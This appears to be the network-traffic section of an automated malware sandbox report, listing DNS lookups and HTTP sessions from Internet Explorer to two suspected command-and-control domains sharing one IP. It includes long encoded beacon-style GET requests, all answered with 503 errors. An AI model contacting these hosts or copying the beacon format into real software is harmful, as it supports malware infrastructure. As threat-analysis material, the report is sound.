Jun 3, 2021 20:58:29.850955963 CEST	53097	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:29.900916100 CEST	53	53097	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:30.618323088 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:30.659836054 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:32.122876883 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:32.163857937 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:33.062453985 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:33.103830099 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:33.880734921 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:33.922137976 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:35.306725979 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:35.357964039 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:40.550982952 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:40.603450060 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:41.270879030 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:41.314271927 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:42.728363991 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:42.777678967 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:43.004414082 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:43.054120064 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:49.299458027 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:49.363847017 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:51.561909914 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:51.612747908 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:51.973151922 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:52.030071020 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:59.458612919 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:59.517313004 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:04.116177082 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:04.178227901 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:05.514527082 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:05.563311100 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:06.177151918 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:06.228729963 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:06.803008080 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:06.844362974 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:07.770484924 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:07.811650991 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:07.854496956 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:07.895936966 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:08.118458986 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:08.167171001 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:09.155507088 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:09.204912901 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:09.377140045 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:09.418251038 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:09.608680964 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:09.659667015 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:09.925596952 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:09.974797964 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:10.195897102 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:10.244766951 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:12.276240110 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:12.325128078 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:13.981653929 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:14.030431986 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:16.334781885 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:16.386286974 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:24.957592010 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:25.006397009 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:40.794476032 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:40.844134092 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:41.769234896 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:41.817846060 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:42.585412979 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:42.634212971 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:42.681878090 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:42.747809887 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:43.508872032 CEST	56448	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:43.558726072 CEST	53	56448	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:44.486007929 CEST	59172	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:44.527015924 CEST	53	59172	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:45.424732924 CEST	62420	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:45.465854883 CEST	53	62420	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:46.335798979 CEST	60579	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:46.384577990 CEST	53	60579	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:47.187053919 CEST	50183	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:47.228147030 CEST	53	50183	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:48.083931923 CEST	61531	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:48.135159016 CEST	53	61531	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:48.983551025 CEST	49228	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:49.026072979 CEST	53	49228	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:49.789155960 CEST	59794	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:49.830544949 CEST	53	59794	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:50.950556040 CEST	55916	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:50.992391109 CEST	53	55916	8.8.8.8	192.168.2.4
Jun 3, 2021 20:59:59.446383953 CEST	52752	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:59:59.736358881 CEST	53	52752	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:22.248929024 CEST	60542	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:22.566713095 CEST	53	60542	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:26.338934898 CEST	60689	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:26.405421972 CEST	53	60689	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:37.094022989 CEST	64206	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:37.147492886 CEST	53	64206	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:41.429744959 CEST	50904	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:41.479338884 CEST	53	50904	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:45.012821913 CEST	57525	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:45.061503887 CEST	53	57525	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:52.170362949 CEST	53814	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:52.301944017 CEST	53	53814	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:52.513509035 CEST	53418	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:52.854248047 CEST	53	53418	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:52.906109095 CEST	62833	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:53.015368938 CEST	53	62833	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:53.699125051 CEST	59260	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:53.833431959 CEST	53	59260	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:54.367196083 CEST	49944	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:54.416418076 CEST	53	49944	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:54.605302095 CEST	63300	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:54.664108038 CEST	53	63300	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:55.022969961 CEST	61449	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:55.071604967 CEST	53	61449	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:55.768132925 CEST	51275	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:55.816900969 CEST	53	51275	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:56.287981987 CEST	63492	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:56.399218082 CEST	53	63492	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:57.276098967 CEST	58945	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:57.325689077 CEST	53	58945	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:58.284984112 CEST	60779	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:58.335410118 CEST	53	60779	8.8.8.8	192.168.2.4
Jun 3, 2021 21:00:58.846343994 CEST	64014	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:00:58.988059044 CEST	53	64014	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:04.069648027 CEST	57091	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:04.402129889 CEST	53	57091	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:07.448107958 CEST	55904	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:07.497453928 CEST	53	55904	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:15.264199972 CEST	52109	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:15.614873886 CEST	53	52109	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:27.148921967 CEST	54450	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:27.173420906 CEST	49374	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:27.197185993 CEST	53	54450	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:27.221927881 CEST	53	49374	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:29.743623018 CEST	50436	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:29.794481039 CEST	53	50436	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:38.328145027 CEST	62605	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:38.627701998 CEST	53	62605	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:49.691500902 CEST	54256	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:49.698194981 CEST	52189	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:49.740120888 CEST	53	54256	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:50.013569117 CEST	53	52189	8.8.8.8	192.168.2.4
Jun 3, 2021 21:01:51.212636948 CEST	56131	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:01:51.261461973 CEST	53	56131	8.8.8.8	192.168.2.4
Jun 3, 2021 21:02:01.055825949 CEST	62992	53	192.168.2.4	8.8.8.8
Jun 3, 2021 21:02:01.104548931 CEST	53	62992	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 3, 2021 20:58:41.270879030 CEST	192.168.2.4	8.8.8.8	0x6d2a	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Jun 3, 2021 20:58:49.299458027 CEST	192.168.2.4	8.8.8.8	0xcf4e	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Jun 3, 2021 20:58:51.561909914 CEST	192.168.2.4	8.8.8.8	0x5a3b	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Jun 3, 2021 20:58:51.973151922 CEST	192.168.2.4	8.8.8.8	0xdd39	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Jun 3, 2021 20:58:59.458612919 CEST	192.168.2.4	8.8.8.8	0xdb70	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:04.116177082 CEST	192.168.2.4	8.8.8.8	0xaa33	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:06.177151918 CEST	192.168.2.4	8.8.8.8	0x8f19	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:07.770484924 CEST	192.168.2.4	8.8.8.8	0xb940	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:09.377140045 CEST	192.168.2.4	8.8.8.8	0x3491	Standard query (0)	s.yimg.com	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:09.608680964 CEST	192.168.2.4	8.8.8.8	0xca68	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:59.446383953 CEST	192.168.2.4	8.8.8.8	0xad35	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:22.248929024 CEST	192.168.2.4	8.8.8.8	0xfa37	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:41.429744959 CEST	192.168.2.4	8.8.8.8	0xdb10	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:45.012821913 CEST	192.168.2.4	8.8.8.8	0xe7bf	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:52.513509035 CEST	192.168.2.4	8.8.8.8	0x727c	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:04.069648027 CEST	192.168.2.4	8.8.8.8	0xa350	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:07.448107958 CEST	192.168.2.4	8.8.8.8	0xca83	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:15.264199972 CEST	192.168.2.4	8.8.8.8	0x6e67	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:27.148921967 CEST	192.168.2.4	8.8.8.8	0x5cb5	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:27.173420906 CEST	192.168.2.4	8.8.8.8	0x214e	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:29.743623018 CEST	192.168.2.4	8.8.8.8	0xaa3d	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:38.328145027 CEST	192.168.2.4	8.8.8.8	0xc33b	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:49.691500902 CEST	192.168.2.4	8.8.8.8	0x5ee0	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:49.698194981 CEST	192.168.2.4	8.8.8.8	0x7b6a	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:51.212636948 CEST	192.168.2.4	8.8.8.8	0x677e	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)
Jun 3, 2021 21:02:01.055825949 CEST	192.168.2.4	8.8.8.8	0x2b5	Standard query (0)	raw.pablowilliano.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 3, 2021 20:58:41.314271927 CEST	8.8.8.8	192.168.2.4	0x6d2a	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 20:58:49.363847017 CEST	8.8.8.8	192.168.2.4	0xcf4e	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 20:58:51.612747908 CEST	8.8.8.8	192.168.2.4	0x5a3b	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Jun 3, 2021 20:58:51.612747908 CEST	8.8.8.8	192.168.2.4	0x5a3b	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Jun 3, 2021 20:58:52.030071020 CEST	8.8.8.8	192.168.2.4	0xdd39	No error (0)	contextual.media.net		23.57.80.37	A (IP address)	IN (0x0001)
Jun 3, 2021 20:58:59.517313004 CEST	8.8.8.8	192.168.2.4	0xdb70	No error (0)	lg3.media.net		23.57.80.37	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:04.178227901 CEST	8.8.8.8	192.168.2.4	0xaa33	No error (0)	hblg.media.net		23.57.80.37	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:06.228729963 CEST	8.8.8.8	192.168.2.4	0x8f19	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 20:59:07.811650991 CEST	8.8.8.8	192.168.2.4	0xb940	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 20:59:07.811650991 CEST	8.8.8.8	192.168.2.4	0xb940	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 20:59:09.418251038 CEST	8.8.8.8	192.168.2.4	0x3491	No error (0)	s.yimg.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 20:59:09.418251038 CEST	8.8.8.8	192.168.2.4	0x3491	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:09.418251038 CEST	8.8.8.8	192.168.2.4	0x3491	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:09.659667015 CEST	8.8.8.8	192.168.2.4	0xca68	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 20:59:09.659667015 CEST	8.8.8.8	192.168.2.4	0xca68	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:09.659667015 CEST	8.8.8.8	192.168.2.4	0xca68	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:09.659667015 CEST	8.8.8.8	192.168.2.4	0xca68	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:09.659667015 CEST	8.8.8.8	192.168.2.4	0xca68	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Jun 3, 2021 20:59:59.736358881 CEST	8.8.8.8	192.168.2.4	0xad35	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:22.566713095 CEST	8.8.8.8	192.168.2.4	0xfa37	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:41.479338884 CEST	8.8.8.8	192.168.2.4	0xdb10	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:45.061503887 CEST	8.8.8.8	192.168.2.4	0xe7bf	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:00:52.854248047 CEST	8.8.8.8	192.168.2.4	0x727c	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:04.402129889 CEST	8.8.8.8	192.168.2.4	0xa350	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:07.497453928 CEST	8.8.8.8	192.168.2.4	0xca83	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:15.614873886 CEST	8.8.8.8	192.168.2.4	0x6e67	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:27.197185993 CEST	8.8.8.8	192.168.2.4	0x5cb5	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:27.221927881 CEST	8.8.8.8	192.168.2.4	0x214e	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:29.794481039 CEST	8.8.8.8	192.168.2.4	0xaa3d	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:38.627701998 CEST	8.8.8.8	192.168.2.4	0xc33b	No error (0)	authd.feronok.com		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:49.740120888 CEST	8.8.8.8	192.168.2.4	0x5ee0	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:50.013569117 CEST	8.8.8.8	192.168.2.4	0x7b6a	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:01:51.261461973 CEST	8.8.8.8	192.168.2.4	0x677e	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)
Jun 3, 2021 21:02:01.104548931 CEST	8.8.8.8	192.168.2.4	0x2b5	No error (0)	raw.pablowilliano.at		34.95.62.189	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

authd.feronok.com

raw.pablowilliano.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49784	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 20:59:59.902120113 CEST	3860	OUT	GET /hmMzQKK9IpZemMI/AV6w9eELu1YSVPBd2B/U2fmYepaP/iI8O34L03l282SsJYJjt/THEo6G77tTZkWbFjswk/x5coSmyB_2F4jLyj_2BWzi/6brroK7xJ8XZw/qfOP9LCj/GvL6W_2BEyoAwzvHXO966ph/vsMK1fkmb9/Ds2jsNIzoVo0lOo11/93YGENzA_2FI/YQv31Ede4MT/_2F4pMgtrANakD/LvbGaJL2nZYMuK54K4Biv/2JptecryCAf4aMir/HTQaPZnOQ8GVTpZ/KhSSbNSk98bViqYzXp/G1toKGfzW/IDNKIf6dXCyDW/4KEp6m HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:00:00.037758112 CEST	3860	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49785	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:00:00.351639986 CEST	3860	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:00:00.488822937 CEST	3861	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49816	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:07.643471003 CEST	7757	OUT	GET /eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1Uc9Lk5/eTvtAYmWtMxfAC/IbcZg8p7Nqfw4xi6JFwgY/iX8lYPiI0RfUKruW/cRS7MvLhOTcIXvx/A_2F5SdmT8BNOtLhIu/P7uLQkYdw/iuMR5Z51enQS4ZwsoBTP/Dtp84_2B7PB4d6Ih_2F/AlW2oiOiFE_2FnyCSEdY9y/vWCqa6t9PLYnR/oBTHljmW/b1W1259HTZYZTaG9O2900Q0/yz_2FOFMzC/llouIHAJZHwF3f0aR/_2FSLB7YfaTL/BdH925d4dS3/7iDYe3o7fiS/Pl HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: raw.pablowilliano.at Connection: Keep-Alive
Jun 3, 2021 21:01:07.778673887 CEST	7757	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49818	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:15.778970957 CEST	7791	OUT	GET /5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgUI7p_2FiVc6/t_2Fl8EaBR1HS_2BNK5/X8y72xR2qjkHaZyrNERbO7/v2peyintdJ24L/Yw8tw7QT/dLXZu5OFhvWbL455USn4LnJ/HMP0smJj_2/FZwXFbprpV3aJCWuX/15bJnANkFNAX/hVoXLTlCLIU/tXHaEx0muHiXJx/btyId5nqGgZC05fEhjIaO/rm6z0UiaoPx_2FiX/TGKuABuP8srX2Ck/eUAi3TXKVNasxDo0P3/laW2oibPa/zBY4kInj1Zn68Xf49Wvw/7KJZdF0VpEe/P HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: raw.pablowilliano.at Connection: Keep-Alive
